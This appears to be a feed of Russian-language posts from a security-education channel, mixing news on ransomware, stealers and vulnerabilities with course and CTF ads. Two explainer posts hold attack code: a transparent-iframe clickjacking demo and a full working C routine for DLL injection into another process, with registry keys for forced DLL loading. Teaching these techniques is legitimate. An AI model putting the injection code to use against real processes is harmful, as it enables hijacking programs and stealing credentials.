👀 "Ужас страховых компаний: HardBit 3.0 и таинственная роль Игоря Войтенко"
Сегодня в новой статье:
🔴 История возникновения и развития HardBit 3.0
🔴 Как страховые компании стали главными мишенями
🔴 Психологический аспект в действиях злоумышленников
🔴 Технический анализ и методы защиты от HardBit 3.0
Что это такое?
💫HardBit Ransomware впервые появился в октябре 2022 года и быстро развился, став одной из наиболее опасных угроз в сфере кибербезопасности.
💫В отличие от многих других групп, работающих с шифровальными программами, HardBit не имеет сайтов для публикации утечек данных и не прибегает к двойному вымогательству.
💫Основные тактики включают кражу и шифрование данных жертв, а затем требование выкупа, а также угрозу дополнительных атак, если требования выкупа не будут выполнены.
📍 Читать подробнее
#hardbit #ransomware
🔥 Курс по Цифровой Криминалистике от Академии Кодебай!
Что будет на курсе?
🌟 Решение задач, основанных на APT-отчетах
🌟 Работа с opensource инструментами на протяжении полного цикла реагирования на инциденты
🌟 Поиск и анализ артефактов, оставленных хакерами и их вредоносным ПО
Для кого создан этот курс?
🔸 для аналитиков 1, 2 и 3 линий SOC
🔸 для для начинающих DFIR и Red Team специалистов
🔸 для организаций — повысить квалификацию сотрудников в сфере реагирования на КИ и форензики ОС семейства UNIX
🗓 Старт: 26 августа
🚀 Пишите нам @Codeby_Academy или узнайте подробнее о курсе здесь.
🚩 Новые задания на платформе Codeby Games!
⚙️ Категория Реверс-инжиниринг — Что это такое?
🔑 Категория Криптография — Запутанный шифр
🔎 Категория OSINT — Код да Винчи
Приятного хакинга!
🚨 Безопасность в коде: Race Condition
Сегодня мы проведем обзор состояния гонки (Race Condition), одного из самых опасных аспектов программирования, который может привести к непредвиденным последствиям в вашем коде. 💥
➡️ В этой статье мы раскроем, как работают состояния гонки, приведем простой пример на Python и обсудим способы их предотвращения.
⌛ Что такое Race Condition?
Это ситуация, когда два или более процесса или потока пытаются изменить общий ресурс одновременно, что может привести к непредсказуемым результатам. Например, двум пользователям, одновременно снимая деньги со своего счета, могут "накрутить" баланс, совершив несколько транзакций вместо одной.
🛡 Как защититься от State Race Condition?
Чтобы избежать состояний гонки, важно использовать механизмы синхронизации, такие как блокировки (Lock
в Python), семафоры, атомарные операции или асинхронный код. Эти инструменты помогают гарантировать, что только один поток или процесс может изменить общий ресурс в любой момент времени.
➡️ Читать подробнее
#racecondition #python
🔄 Курс «Введение в Реверс инжиниринг»! Запись до 17 августа
Курс подойдёт всем интересующимся темой реверс-инжиниринга. По окончанию курса, вы будете уметь проводить исследования исполняемых файлов и вносить изменения в логику программ. ⌨️
Курс включает в себя:
🔸 Работу с отладчиком IDA
🔸 Практические навыки анализа исполняемых файлов без исходного кода
🔸 Изучение ассемблера, языка Си и EXE / ELF
🔸 Восстановление исходного кода из скомпилированных программ
⭐️ Сертификат / удостоверение о повышении квалификации
🚀 Пишите нам @Codeby_Academy или узнайте подробнее о курсе здесь
🔄 Сегодня мы поговорим о том, как объединить большие наборы данных из нескольких CSV-файлов в один, используя SQLite3 и Python.
Это особенно полезно, когда у вас есть ограниченное количество оперативной памяти или когда вы работаете с очень большими файлами данных. Об этом в новой части цикла статей на codeby.net 🖥
💛 Создадим вспомогательные функции для работы с базой данных, научимся читать данные из CSV-файлов, добавлять их в базу данных и сохранять результаты в новый файл.
💛 Рассмотрим, как оптимизировать процесс для больших объемов данных, чтобы избежать перегрузки оперативной памяти.
💛 Создадим два ключевых файла: base_work.py для работы с базой данных и merge_csv.py для чтения данных из CSV, их объединения и сохранения результата.
💡 Этот метод идеально подходит для объединения файлов с одинаковой структурой заголовков и может быть адаптирован под ваши конкретные нужды.
➡️ Читать подробный гайд по созданию скрипта для объединения больших наборов данных без значительного использования оперативной памяти!
#csv #python
👥 Главный фактор уязвимости компаний — устаревшее ПО
Исследование Positive Technologies показало, что треть успешных кибератак связана с устаревшим ПО. С 2022 по 2023 год этот метод использовался для кражи данных у более чем 2700 компаний.
⏺️ Доля таких атак выросла с 18% в 2019 году до 32% в 2023 году. В мае 2023 года массовая атака на сайты .ru и .рф произошла из-за уязвимости в «1С-Битрикс», а телекоммуникационная компания Xfinity потеряла данные 36 миллионов клиентов.
📣 Хакеры захватили 35 000 доменов через DNS-атаку Sitting Ducks
Эксперты из Infoblox и Eclypsium предупреждают о DNS-атаке Sitting Ducks, которая угрожает более миллиону доменов ежедневно. Уже захвачены 35 000 доменов. Атака позволяет перехватить домен без доступа к аккаунту владельца у DNS-провайдера или регистратора.
🌚 Sitting Ducks использует конфигурационные проблемы у регистраторов и недостаточную проверку прав собственности у DNS-провайдеров. Впервые об этой уязвимости сообщил специалист Snap Мэтью Брайант в 2016 году, но она до сих пор остается актуальной и эффективной.Читать полностью…
⚠️ Учёные нашли способ красть данные через HDMI
Уругвайские исследователи разработали метод кражи конфиденциальной информации, используя ИИ и интерфейс HDMI.
➡️ Они смогли зафиксировать электромагнитные сигналы от кабеля HDMI, подключенного к компьютеру, и расшифровать их с помощью ИИ.
🗣️ Метод позволяет с точностью 70% выявлять пароли, которые вводит пользователь. Учёные сообщают, что хакеры уже использовали эту технику для шпионажа за правительственными организациями и частными компаниями.Читать полностью…
🚩 Новые задания на платформе Codeby Games!
🖼 Категория Стеганография — Нейросеть
🏆 Категория Квесты — СМС
🌍 Категория Веб — Физический доступ
Приятного хакинга!
👩💻 Chrome будет спрашивать, почему ты загружаешь подозрительный файл
Google изменила политику Chrome для работы с подозрительными файлами. Теперь браузер будет спрашивать, зачем ты скачиваешь потенциально опасный файл.
🗣️ Chrome использует Safe Browsing для защиты от угроз. Файлы проверяются в реальном времени, и загрузка останавливается, если обнаружена опасность. Также, последние версии Chrome показывают всплывающее меню при скачивании подозрительных файлов.Читать полностью…
🇫🇷 Франция столкнулась с 68 кибератаками с начала Олимпиады в Париже
С 26 июля, когда начались Олимпийские игры в Париже, Франция пережила 68 кибератак. Об этом сообщил премьер-министр Габриэль Атталь.
🗣️ Большинство атак были направлены на ресурсы олимпийских объектов. Все, кроме двух из них, были быстро обнаружены и предотвращены, отметил Атталь.Читать полностью…
Привет, Кодебай! 😎
Эта статья посвящена "ShotStars" - инструменту, который открывает новые горизонты в изучении GitHub. Этот скрипт позволяет вам увидеть, кто ставил звёзды на ваши проекты, даже когда они были убраны. И всё это без необходимости регистрации, авторизации или использования токенов GitHub! 🤫
🔍 Как это работает?
- "ShotStars" анализирует данные о звёздach в репозиториях, позволяя вам видеть, кто был заинтересован в вашем проекте
- Поддерживает работу с различными операционными системами, включая GNU/Linux, Windows и Android через Termux
- Предоставляет подробные отчёты в формате CLI и HTML, включая расчётные даты и временные интервалы
- Имеет встроенную поддержку имитации результатов для тестирования
💡 Особенности:
- Поддержка сессий и корректная остановка программы
- Приятные бонусы в виде прогресс-баров, таблиц и баннеров
- Работает с проектами до 6000 звёзд в час, учитывая лимиты GitHub API
❌ Ограничения:
- Необходимость ручного обновления данных при превышении лимитов GitHub API
- Нельзя обнаруживать одних и тех же пользователей, которые поставили и сняли звёздy в промежуток времени между сканированиями
➡️ Читать подробнее
💻 Где практиковаться этичному хакингу?
Codeby Games предлагает тебе уникальную возможность отточить свои навыки пентеста, решая задачи, приближенные к боевым!
- Более 50 уязвимых машин на Windows и Linux
- Более 300 CTF заданий
- Регулярные обновления
- Самое отзывчивое комьюнити
Огромное количество практики в любой из областей информационной безопасности:
🌍 Web-эксплуатация
🔑 Криптография
🕵️♂️ Форензика
🔍 OSINT
🖼 Стеганография
🧰 PWN
⚙️ Реверс-инжиниринг
💻 Active Directory
Присоединяйся к Codeby Games и окунись в мир инфобеза уже сегодня!
➡️ https://codeby.games/
Приятного хакинга!
💻 Indirector: Уязвимость в процессорах Intel
Исследователи из Калифорнийского университета в Сан-Диего выявили уязвимость Indirector в процессорах Intel Raptor Lake и Alder Lake. Этот метод позволяет атакующему изменять спекулятивное выполнение инструкций в других процессах.
➡️ Основные особенности атаки:•
IBP (Буфер предсказания косвенных переходов): Предсказывает переходы, когда адрес неизвестен.•
BTB (Буфер предсказания переходов): Хранит информацию о недавних переходах.
🗣️ Атакующий может искажать содержимое этих буферов, подставляя произвольные адреса переходов.Читать полностью…
#работа
Приглашаем в команду Кодебай
Junior+ Go Backend Разработчика
Белая зарплата
Оклад от 100.000 руб
Полная занятость
Обязанности:
- Разработка и поддержка серверной логики на Go (Golang).
- Работа с базами данных PostgreSQL и кэш-системой Redis.
- Интеграция и управление очередями сообщений с использованием RabbitMQ.
- Создание и управление контейнерами с использованием Docker.
- Участие в проектировании архитектуры приложений и написание технической документации.
- Взаимодействие с командой для достижения общих целей.
Требования:
- Уверенные знания и опыт работы с Go (Golang).
- Опыт работы с PostgreSQL и Redis.
- Знание принципов работы и опыт интеграции с RabbitMQ.
- Навыки работы с Docker.
- Понимание принципов REST API и микросервисной архитектуры.
- Основы Linux и уверенное владение командной строкой.
- Умение работать в команде и хорошие коммуникативные навыки.
- Готовность к обучению и развитию новых навыков.
Прислать резюме и пообщаться: @stpov
Что такое clickjacking (захват клика)? 👩💻
⏺️Атака типа clickjacking позволяет вредоносной странице кликнуть по сайту-жертве от имени посетителя.
🌚 План атаки:
Посетителя заманивают на вредоносную страницу (неважно как).
На странице есть ссылка, которая выглядит безобидно.
Поверх этой ссылки вредоносная страница размещает прозрачный <iframe> с src с сайта facebook.com таким образом, что кнопка «like» находится прямо над этой ссылкой. Обычно это делается с помощью z-index в CSS.
При попытке клика на эту ссылку посетитель на самом деле нажимает на кнопку.
index.html
⬇️
<!DOCTYPE html>
<html>
<body>
<style>
iframe {
width: 400px;
height: 100px;
position: absolute;
top: 5px;
left: -14px;
opacity: 0;
z-index: 1;
}
</style>
<div>Нажми:</div>
<iframe src="codeby.html"></iframe>
<button>Нажмите сюда!</button>
</body>
</html>
codeby.html
⬇️
<!DOCTYPE HTML>Читать полностью…
<html>
<body style="margin:10px;padding:10px">
<input type="button" onclick="alert('Бум')" value="!">
</body>
</html>
🌐 Безопасность в публичных Wi-Fi сетях
Публичные Wi-Fi сети могут быть удобны, но они также несут риски для безопасности. Вот как защитить себя:
Практические советы⬇️
⏺️Используйте VPN: Виртуальная частная сеть (VPN) шифрует ваш трафик и защищает данные от перехвата.
⏺️Избегайте ввода личной информации: Не вводите пароли, номера кредитных карт и другую личную информацию при подключении к публичным сетям.
⏺️Выключайте автоматическое подключение: Отключите функцию автоматического подключения к доступным сетям на вашем устройстве.
⏺️Обновляйте ПО: Убедитесь, что ваше устройство и все приложения обновлены до последних версий для защиты от уязвимостей.
⏺️Используйте HTTPS: Всегда проверяйте, что сайт использует защищенное соединение (https://) при вводе любой информации.
🌚 ПримерЧитать полностью…
Подключившись к Wi-Fi в кафе, используйте VPN для шифрования трафика. Никогда не вводите пароли или номера кредитных карт без защищенного соединения (HTTPS).
🤫 Что такое Raccoon Stealer? Об этом в новой статье!
🔸Это вредоносное ПО, специализирующееся на краже данных из криптовалютных кошельков и браузеров.
🔸Он также может красть данные из игровой платформы Steam, а также логиновые данные для Discord и Telegram.
🔸Некоторые версии Raccoon могут нарушать шифрование TLS, позволяя ему эффективно проводить атаки "man-in-the-middle" на зараженный хост.
❓ Как работает Raccoon Stealer?
После установки на устройстве, вредонос выполняет ряд действий: импорт библиотек, деобфускацию значений, связь с командным сервером, установку дополнительных DLL библиотек и, наконец, непосредственную кражу данных.
Для изучения Raccoon Stealer используются такие инструменты, как DIE, PE Bear, Tiny Tracer, IDA PRO, Reko, HollowHunter и Hidra. Они помогают визуализировать структуру вредоноса, определить его функции и методы работы.
👩💻 Apple выпустила открытую библиотеку гомоморфного шифрования
Apple представила библиотеку для гомоморфного шифрования на Swift, позволяющую создавать приложения, работающие с зашифрованными данными без их раскрытия.
🌚 Гомоморфное шифрование позволяет выполнять вычисления с зашифрованными данными. Данные остаются защищёнными на всех этапах обработки: от шифрования и передачи на сервер до выполнения вычислений и возвращения результата. Расшифровать данные может только пользователь, обладающий ключами.
⚡️ Новый курс "Устройства для тестирования на проникновение" стартует 12 августа. Изучите создание устройств для пентеста на практике!
Что вы получите после обучения?
🔸 Практические навыки работы с микроконтроллерами и микрокомпьютерами
🔸 Навыки сборки устройств для тестирования на проникновение
🔸 Актуальные знания по защитному функционалу
Курс создан для всех, кто хочет на практике изучить техники аудита систем ИБ и эксплуатации уязвимостей с помощью современных устройств.
🥇 Сертификат / удостоверение о повышении квалификации
Пишите нам: @Codeby_Academy 🚀
➡️ Узнать подробнее о курсе
Что такое DLL-injection? 👩💻
⏺️DLL-инъекции часто используются внешними программами, чтобы повлиять на поведение другой программы так, как её авторы не задумывали и не предполагали.
⏺️Например, внедрённый код может перехватывать системные вызовы функций или прочитать содержимое текстовых полей пароля, что невозможно сделать обычным способом.
👩💻 На Windows имеется множество способов заставить процесс загрузить код в DLL-библиотеке:
DLL-файлы, указанные в списке системного реестра по ключу HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\AppInit_DLLs, будут загружаться в каждом процессе, загружающем библиотеку User32.dll при её начальном вызове.
DLL-файлы по ключу HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\AppCertDLLs будут загружаться в каждом процессе, которые вызывают функции Windows API CreateProcess, CreateProcessAsUser, CreateProcessWithLogonW, CreateProcessWithTokenW и WinExec.
Эксплуатация ограничений Windows и приложений, вызывающих LoadLibrary или LoadLibraryEx без указания пути к загружаемой DLL.
#include <windows.h>Читать полностью…
HANDLE inject_DLL(const char* file_name, int PID)
{
HANDLE h_process, h_rThread;
char fullDLLPath[_MAX_PATH];
LPVOID DLLPath_addr, LoadLib_addr;
DWORD exit_code;
/* Извлечение handle-идентификатора целевого процесса */
h_process = OpenProcess(PROCESS_ALL_ACCESS, FALSE, PID);
/* Получение полного пути к DLL-файлу */
GetFullPathName(file_name, _MAX_PATH, fullDLLPath, NULL);
/* Выделение памяти в целевом процессе */
DLLPath_addr = VirtualAllocEx(h_process, NULL, _MAX_PATH,
MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
/* Запись пути к DLL-файлу в недавно созданный блок памяти */
WriteProcessMemory(h_process, DLLPath_addr, fullDLLPath,
strlen(fullDLLPath), NULL);
/* Получение адреса LoadLibraryA (такой же для всех процессов), чтобы начать его запуск */
LoadLib_addr = GetProcAddress(GetModuleHandle("Kernel32"), "LoadLibraryA");
/* Запуск удалённого потока в LoadLibraryA, и проброс пути к DLL в качестве аргумента */
h_rThread = CreateRemoteThread(h_process, NULL, 0,
(LPTHREAD_START_ROUTINE)LoadLib_addr, DLLPath_addr, 0, NULL);
/* Ожидание его завершения */
WaitForSingleObject(h_rThread, INFINITE);
/* Получение кода завершения (то есть, значение handle, возвращённый вызовом LoadLibraryA */
GetExitCodeThread(h_rThread, &exit_code);
/* Освобождение носителя внедрённого потока. */
CloseHandle(h_rThread);
/* А также память, выделенная для пути к DLL */
VirtualFreeEx(h_process, DLLPath_addr, 0, MEM_RELEASE);
/* А также handle-иднетификатор целевого процесса */
CloseHandle(h_process);
return (HANDLE)exit_code;
}
😎 Напоминаем, на каких курсах начинается обучение в августе:
🌟 7 августа — «Введение в Реверс инжиниринг»
🌟 8 августа — «Основы Linux»
🌟 12 августа — «Устройства для тестирования на проникновение» — Первый поток!
🌟 26 августа — «Цифровая криминалистика и реагирование на инциденты ОС Linux (DFIR)»
✔️ Запись на «Боевой OSINT» открыта до 15 августа!
✔️ Скидка 5% на «Анализ защищенности инфраструктуры на основе технологий Active Directory» при записи до 23 августа!
🔔 Запишитесь у нашего менеджера @Codeby_Academy 🚀 или узнайте подробности на сайте!
🐧 Обнаружена 0-day уязвимость в драйвере n_gsm
В ядре Linux выявлена 0-day уязвимость в драйвере n_gsm, позволяющая выполнить код на уровне ядра и получить привилегии в системе. Эксплоиты для этой уязвимости уже появились в открытом доступе, и проблема остается неисправленной.
⏺️ Драйвер n_gsm реализует протокол GSM 07.10 для GSM-модемов. Уязвимость связана с состоянием гонки в обработчике ioctl GSMIOC_SETCONF_DLCI, что приводит к обращению к памяти после её освобождения (use-after-free).
🌚 Эксплоит может быть использован на системах с ядрами Linux от версии 5.15 до 6.5. Чтобы предотвратить автоматическую загрузку уязвимого модуля, добавьте в файл /etc/modprobe.d/blacklist.conf
строку «blacklist n_gsm
».
Привет, Кодебай! 😎
🔄 Мы продолжаем нашу серию статей о работе с наборами данных в CSV-файлах с помощью Python. В первой части мы уже разобрали нормализацию текстовых данных.
🕯 В этой статье мы создадим обработчик строк файла CSV, который будет использовать наши ранее написанные функции нормализации. Вы узнаете, как читать данные из файлов и сохранять обработанные данные обратно в файлы. Мы также рассмотрим, как обрабатывать большие объемы данных без исчерпания оперативной памяти.
➡️ Читать подробнее и улучшить свои навыки по обработке данных! 👩💻
➡️ Освоить Python и применять в задачах по пентесту! 🥇
#Python #CSV #ОбработкаДанных
😎 Новая статья в блоге Академии — сегодня мы погрузимся в историю OSINT (Open Source Intelligence).
🔸Откуда все началось?
🔸Как OSINT применялся в различных мировых кейсах?
🔸Как вы можете использовать эти знания сегодня?
📣 Мы расскажем о ключевых моментах развития OSINT, поделимся примерами успешного использования этих технологий и расскажем как овладеть мастерством разведки вместе с нами. 🙂
➡️ Читать подробнее
А что вы знаете про OSINT? Делитесь интересными фактами и своими историями в комментариях! (лучшую историю опубликуем в канале)
Как защитить свой бизнес от атак на цепочки поставок?
В новом выпуске подкаста «Безопасно говоря» обсудили, как предотвратить supply chain attack. Своим опытом риск-менеджмента поделились эксперты кибербеза Yandex Cloud Алексей Миртов и Рами Мулей, а также директора по ИБ из «Хоум Банка» и Московской биржи.
Полный выпуск по ссылке.
🖥 SnailLoad: Как хакеры узнают ваши посещения сайтов
Атака SnailLoad разработана исследователями из Австрии. Эта атака позволяет хакерам узнать, какие сайты вы посещаете и какие видео смотрите на YouTube, анализируя задержки пакетов.
❓ Как это работает
Для этой атаки не нужен MITM (Man-In-The-Middle). Всё, что требуется хакерам, это чтобы жертва открыла в браузере страницу, контролируемую атакующими. Эта страница загружает большие файлы или изображения с их сервера. Даже без JavaScript, непрерывный поток трафика позволяет провести атаку.
➡️ Хакеры анализируют задержки доставки пакетов. Эти задержки меняются из-за запросов, выполняемых пользователем к различным сайтам.
🛡 Как защититься, ваши идеи?•
Добавляйте случайный шум в трафик.•
Следите за фоновой сетевой активностью.
• Запускайте приложения с разным типом трафика.
👩💻 Критическая уязвимость в GitLab
➡️ Недавно вышли обновления для GitLab: версии 17.1.2, 17.0.4 и 16.11.6. В них исправлены шесть уязвимостей, включая критическую (CVE-2024-6385).
🗣️ Эта уязвимость позволяет злоумышленнику запускать pipeline jobs от имени другого пользователя, получая доступ к внутренним репозиториям и закрытым проектам.
# For GitLab CEЧитать полностью…
sudo apt-get update
sudo apt-get install gitlab-ce=17.1.2-ce.0
# For GitLab EE
sudo apt-get update
sudo apt-get install gitlab-ee=17.1.2-ee.0
⚡️ Освойте лучшие практики OSINT вместе с Академией Кодебай!
Курс "Боевой OSINT" создан для пентестеров и специалистов по бизнес-разведке.
🗓 Старт потока: 5 августа
Вы научитесь:
⏺ Обеспечивать свою безопасность при поиске (Counter-OSINT)
⏺ Находить информацию в СlearNet и DarkNet
⏺ Автоматизировать сбор аналитики
⏺ Находить информацию о юридических или физических лицах как в RU-сегменте, так и за его пределами
🚀 @Codeby_Academy
🔗 Узнать подробнее о курсе